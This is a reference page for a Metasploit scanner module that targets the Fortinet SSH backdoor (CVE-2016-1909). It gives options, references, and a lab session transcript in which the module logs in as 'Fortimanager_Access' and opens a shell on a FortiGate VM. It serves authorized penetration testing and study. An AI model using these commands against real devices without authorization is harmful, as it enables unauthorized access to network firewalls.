Fortinet SSH Backdoor Scanner - Metasploit
This page contains detailed information about how to use the auxiliary/scanner/ssh/fortinet_backdoor metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Fortinet SSH Backdoor Scanner
Module: auxiliary/scanner/ssh/fortinet_backdoor
Source code: modules/auxiliary/scanner/ssh/fortinet_backdoor.rb
Disclosure date: 2016-01-09
Last modification time: 2022-04-14 17:27:19 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 22
List of CVEs: CVE-2016-1909
This module scans for the Fortinet SSH backdoor.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
This module is a scanner module, and is capable of testing against multiple hosts.
msf > use auxiliary/scanner/ssh/fortinet_backdoor
msf auxiliary(fortinet_backdoor) > show options
... show and set options ...
msf auxiliary(fortinet_backdoor) > set RHOSTS ip-range
msf auxiliary(fortinet_backdoor) > exploit
Other examples of setting the RHOSTS option:
Example 1:
msf auxiliary(fortinet_backdoor) > set RHOSTS 192.168.1.3-192.168.1.200
Example 2:
msf auxiliary(fortinet_backdoor) > set RHOSTS 192.168.1.1/24
Example 3:
msf auxiliary(fortinet_backdoor) > set RHOSTS file:/tmp/ip_list.txt
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Introduction
This module scans for the Fortinet SSH backdoor and creates sessions.
Setup
git clone https://github.com/nixawk/labs
- Import
FortiGate-Backdoor-VM/FortiGate-VM.ovf
into VMware - http://help.fortinet.com/fweb/580/Content/FortiWeb/fortiweb-admin/network_settings.htm
Usage
msf5 > use auxiliary/scanner/ssh/fortinet_backdoor
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set rhosts 192.168.212.0/24
rhosts => 192.168.212.0/24
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > set threads 100
threads => 100
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > run
[*] Scanned 54 of 256 hosts (21% complete)
[+] 192.168.212.128:22 - Logged in as Fortimanager_Access
[*] Scanned 65 of 256 hosts (25% complete)
[*] Scanned 78 of 256 hosts (30% complete)
[*] Command shell session 1 opened (192.168.212.1:40605 -> 192.168.212.128:22) at 2018-02-21 21:35:11 -0600
[*] Scanned 104 of 256 hosts (40% complete)
[*] Scanned 141 of 256 hosts (55% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 240 of 256 hosts (93% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/fortinet_backdoor) > sessions -1
[*] Starting interaction with 1...
FortiGate-VM # get system status
Version: FortiGate-VM v5.0,build0228,130809 (GA Patch 4)
Virus-DB: 16.00560(2012-10-19 08:31)
Extended DB: 1.00000(2012-10-17 15:46)
Extreme DB: 1.00000(2012-10-17 15:47)
IPS-DB: 4.00345(2013-05-23 00:39)
IPS-ETDB: 0.00000(2000-00-00 00:00)
Serial-Number: FGVM00UNLICENSED
Botnet DB: 1.00000(2012-05-28 22:51)
License Status: Evaluation license expired
Evaluation License Expires: Thu Jan 28 13:05:41 2016
BIOS version: 04000002
Log hard disk: Need format
Hostname: FortiGate-VM
Operation Mode: NAT
Current virtual domain: root
Max number of virtual domains: 10
Virtual domains status: 1 in NAT mode, 0 in TP mode
Virtual domain configuration: disable
FIPS-CC mode: disable
Current HA mode: standalone
Branch point: 228
Release Version Information: GA Patch 4
System time: Wed Feb 21 13:13:43 2018
FortiGate-VM #
Go back to menu.
Msfconsole Usage
Here is how the scanner/ssh/fortinet_backdoor auxiliary module looks in the msfconsole:
msf6 > use auxiliary/scanner/ssh/fortinet_backdoor
msf6 auxiliary(scanner/ssh/fortinet_backdoor) > show info
Name: Fortinet SSH Backdoor Scanner
Module: auxiliary/scanner/ssh/fortinet_backdoor
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2016-01-09
Provided by:
operator8203 <[email protected]>
wvu <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
Description:
This module scans for the Fortinet SSH backdoor.
References:
https://nvd.nist.gov/vuln/detail/CVE-2016-1909
https://www.exploit-db.com/exploits/39224
https://packetstormsecurity.com/files/135225
https://seclists.org/fulldisclosure/2016/Jan/26
https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios
Module Options
This is a complete list of options available in the scanner/ssh/fortinet_backdoor auxiliary module:
msf6 auxiliary(scanner/ssh/fortinet_backdoor) > show options
Module options (auxiliary/scanner/ssh/fortinet_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
THREADS 1 yes The number of concurrent threads (max one per host)
Advanced Options
Here is a complete list of advanced options supported by the scanner/ssh/fortinet_backdoor auxiliary module:
msf6 auxiliary(scanner/ssh/fortinet_backdoor) > show advanced
Module advanced options (auxiliary/scanner/ssh/fortinet_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
SSH_DEBUG false no SSH debugging
SSH_IDENT SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 yes SSH client identification string
SSH_TIMEOUT 10 no SSH timeout
ShowProgress true yes Display progress messages during a scan
ShowProgressPercent 10 yes The interval in percent that progress should be shown
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the scanner/ssh/fortinet_backdoor module can do:
msf6 auxiliary(scanner/ssh/fortinet_backdoor) > show actions
Auxiliary actions:
Name Description
---- -----------
Evasion Options
Here is the full list of possible evasion options supported by the scanner/ssh/fortinet_backdoor auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(scanner/ssh/fortinet_backdoor) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Related Pull Requests
- #11103 Merged Pull Request: Add CreateSession option to opt out of session creation in login modules
- #10973 Merged Pull Request: Rework DisclosureDate check in msftidy, including ISO 8601 support
- #10649 Merged Pull Request: Fix http://seclists.org links to https://
- #10593 Merged Pull Request: Refactor SSH mixins and update modules
- #10456 Merged Pull Request: Remove SSH scanner using known_hosts
- #9602 Merged Pull Request: Create sessions with the Fortinet SSH backdoor scanner
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #7018 Merged Pull Request: Un-Vendor the net-ssh library
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #6612 Merged Pull Request: Add Fortinet backdoor
References
- CVE-2016-1909
- EDB-39224
- PACKETSTORM-135225
- https://seclists.org/fulldisclosure/2016/Jan/26
- https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios
See Also
Check also the following modules related to this module:
- auxiliary/scanner/http/fortinet_ssl_vpn
- auxiliary/scanner/ssh/apache_karaf_command_execution
- auxiliary/scanner/ssh/cerberus_sftp_enumusers
- auxiliary/scanner/ssh/detect_kippo
- auxiliary/scanner/ssh/eaton_xpert_backdoor
- auxiliary/scanner/ssh/juniper_backdoor
- auxiliary/scanner/ssh/karaf_login
- auxiliary/scanner/ssh/libssh_auth_bypass
- auxiliary/scanner/ssh/ssh_enum_git_keys
- auxiliary/scanner/ssh/ssh_enumusers
- auxiliary/scanner/ssh/ssh_identify_pubkeys
- auxiliary/scanner/ssh/ssh_login
- auxiliary/scanner/ssh/ssh_login_pubkey
- auxiliary/scanner/ssh/ssh_version
- exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684
- auxiliary/scanner/http/dlink_user_agent_backdoor
- auxiliary/dos/windows/ssh/sysax_sshd_kexchange
- auxiliary/fuzzers/ssh/ssh_kexinit_corrupt
- auxiliary/fuzzers/ssh/ssh_version_15
- auxiliary/fuzzers/ssh/ssh_version_2
- auxiliary/fuzzers/ssh/ssh_version_corrupt
- auxiliary/scanner/backdoor/energizer_duo_detect
- exploit/windows/backdoor/energizer_duo_payload
- auxiliary/scanner/misc/sercomm_backdoor_scanner
- auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss
Authors
- operator8203 <operator8203[at]runbox.com>
- wvu
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.